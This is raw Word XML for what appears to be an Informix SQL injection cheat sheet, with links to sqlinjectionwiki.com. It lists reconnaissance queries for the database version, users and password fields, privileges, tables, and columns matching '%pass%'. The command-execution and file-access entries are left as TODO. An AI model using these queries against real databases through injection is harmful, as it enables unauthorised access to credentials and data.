              <w:t xml:space="preserve">SELECT DBINFO(‘version’, ‘major’), DBINFO(‘version’, ‘minor’), DBINFO(‘version’, ‘level’)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WHERE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1;</w:t>
            </w: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br/>
              <w:t>SELECT DBINFO(‘version’, ‘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os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’)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WHERE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1; — T=Windows, U=32 bit app on 32-bit Unix, H=32-bit app running on 64-bit Unix, F=64-bit app running on 64-bit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unix</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/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Comments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select 1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WHERE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1; — comment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Current User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SELECT USER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WHERE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1;</w:t>
            </w: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br/>
              <w:t xml:space="preserve">select CURRENT_ROLE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WHERE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1;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List Users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select username,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usertype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, password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sysusers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;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lastRenderedPageBreak/>
              <w:t>List Password Hashes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TODO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List Privileges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select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tabname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, grantor, grantee,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tabauth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systabauth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join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on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systables.tabid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systabauth.tabid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; — which tables are accessible by which users</w:t>
            </w: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br/>
              <w:t xml:space="preserve">select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procname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, owner, grantor, grantee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sysprocauth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join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sysprocedures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on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sysprocauth.procid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sysprocedures.procid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; — which procedures are accessible by which users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List DBA Accounts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TODO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Current Database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SELECT DBSERVERNAME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where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1; — server name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List Databases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select name, owner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sysdatabases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;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List Columns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select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tabname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,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colname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, owner,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coltype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syscolumns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join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on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syscolumns.tabid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systables.tabid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;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List Tables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select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tabname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, owner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;</w:t>
            </w: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br/>
              <w:t xml:space="preserve">select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tabname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,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viewtext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sysviews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  join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on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systables.tabid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sysviews.tabid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;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List Stored Procedures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select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procname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, owner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sysprocedures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;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Find Tables From Column Name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select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tabname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,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colname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, owner,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coltype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syscolumns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join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on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syscolumns.tabid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systables.tabid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where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colname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like ‘%pass%’;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Select Nth Row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select first 1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from (select first 10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order by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) as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sq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order by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desc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; — selects the 10th row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Select Nth Char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SELECT SUBSTRING(‘ABCD’ FROM 3 FOR 1)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where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1; — returns ‘C’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select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bitand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(6, 1)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where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1; — returns 0</w:t>
            </w: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br/>
              <w:t xml:space="preserve">select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bitand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(6, 2)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where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1; — returns 2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ASCII Value -&gt; Char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TODO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Char -&gt; ASCII Value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select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ascii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(‘A’)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where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1;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Casting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select cast(’123′ as integer)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where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1;</w:t>
            </w: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br/>
              <w:t xml:space="preserve">select cast(1 as char)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where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1;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String Concatenation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SELECT ‘A’ || ‘B’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where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1; — returns ‘AB’</w:t>
            </w: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br/>
              <w:t xml:space="preserve">SELECT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concat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(‘A’, ‘B’)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where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1; — returns ‘AB’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String Length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SELECT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tabname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, length(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tabname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),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char_length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(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tabname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),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octet_length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(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tabname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)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;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If Statement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TODO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lastRenderedPageBreak/>
              <w:t>Case Statement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select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, case when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&gt;10 then “High” else ‘Low’ end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;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Avoiding Quotes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TODO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Time Delay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TODO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Make DNS Requests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TODO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Command Execution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TODO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Local File Access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TODO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Hostname, IP Address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SELECT DBINFO(‘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dbhostname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’) FROM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systables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WHERE </w:t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tabid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 xml:space="preserve"> = 1; — hostname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Location of DB files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TODO</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EA100A" w:rsidRPr="00EA100A" w:rsidTr="00EA100A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Default/System Databases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100A" w:rsidRPr="00EA100A" w:rsidRDefault="00EA100A" w:rsidP="00EA100A">
            <w:pPr>
              <w:spacing w:after="0" w:line="262" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4C5356"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pP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These are the system databases:</w:t>
            </w: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br/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sysmaster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br/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sysadmin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*</w:t>
            </w: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br/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sysuser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*</w:t>
            </w:r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br/>
            </w:r>
            <w:proofErr w:type="spellStart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sysutils</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00EA100A">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="4C5356"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>*</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00EA100A" w:rsidRDefault="00EA100A"/>
    <w:sectPr w:rsidR="00EA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83E5B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DDB6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7422D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E5E6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353C9C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DFF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BC6904"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0202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FC146B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FDFA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74408C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="10C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6133D7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="EE56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6317AE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6836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0A"/>
    <w:rsid w:val="008C4732"/>
    <w:rsid w:val="00B41F3B"/>
    <w:rsid w:val="00C24351"/>
    <w:rsid w:val="00C51FB6"/>
    <w:rsid w:val="00EA100A"/>
    <w:rsid w:val="00F9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40A6B-D102-460D-AF81-82AE4986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1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1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10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10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A10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A1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6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5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1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3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7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3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1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5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7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injectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-she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qlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-she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qlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet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qlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://packetstormsecurity.org/libraries/lib_mysqludf_sys_0.0.3.tar.gz" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-she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qlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-sheet/" TargetMode="External"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.sqlinjectionwiki.com/Categories/2/mysql-sql-injection-cheat-shee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Y'Ash</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Y'Ash</cp:lastModifiedBy>
  <cp:revision>6</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2015-01-20T05:36:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-01-21T09:54:00Z</dcterms:modified>
</cp:coreProperties>
</file>